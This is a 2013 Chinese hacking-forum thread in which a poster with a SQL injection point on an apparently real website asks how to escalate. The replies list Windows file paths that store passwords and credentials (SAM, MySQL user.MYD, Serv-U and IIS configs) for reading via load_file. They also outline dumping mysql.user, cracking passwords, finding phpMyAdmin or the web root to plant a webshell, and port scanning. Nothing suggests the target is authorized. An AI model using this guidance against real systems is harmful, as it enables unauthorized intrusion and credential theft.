php mysql 4 数字型注入 遇到了巨大困难。。。

lxj616 | 2013-05-13 22:08

一个注入点,求大神指导

cast(database() as char) 回显:tempdb

version()                回显:4.0.26-nt

user()                   回显:root@localhost

然后没办法,4.0我只会猜表名(from admin,from xxx,...看有木有doesn't exist),结果一个表都没猜出来 havij也什么都没跑出来

怎么办?除了猜还有木有其他办法?

---------------------------分界线-------------------------------------

然后我load_file 发现能用,

找到了boot.ini,my.ini 读出来了 发现拿着钥匙找不到锁,连接失败(可能不在一台服务器上)

咋办?

还有其他可能有用的文件吗?写个python脚本批量猜我还是会的,但是我应该猜哪些可能有用的文件?

---------------------------分界线-------------------------------------

然后由于不知道网站路径,也没试webshell

如何获取网站的路径?如果猜怎么猜?

遇到这种情况还有其他神马思路吗?

1#

0x7c (我的0day用完了…) | 2013-05-13 22:27

INDOWS下:

c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

2#

80safe | 2013-05-13 23:48

user()                   回显:root@localhost  #说明在同一服上

思路如下:

1、select user,password,host from mysql.user limit 0,1 把所有用户弄出来,看看有没有可以外连的用户

2、如果可以外连破密码进去基本上就KO了,如果不能外连找phpMyAdmin找到了一样KO

3、确定下'转义了没有,如果没有转义,找网站根目录,照样KO

4、如果单引号转义了也没有外连用户,也没找到PHPMYADMIN,NMAP下端口再按照 上面的配置文件来读吧!

source

留言评论(旧系统):

佚名 @ 2013-05-14 17:43:49

http://www.weibo.com/1401527553/zwgs03RgX http://www.weibo.com/1401527553/zwGMK22sU 这位老黑阔发现神马了?

本站回复:

不知所云……